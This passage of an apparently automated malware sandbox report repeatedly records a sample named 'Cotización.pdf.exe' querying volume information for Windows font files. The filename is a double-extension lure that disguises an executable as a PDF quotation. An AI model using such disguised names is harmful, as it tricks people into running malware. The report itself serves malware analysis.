              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
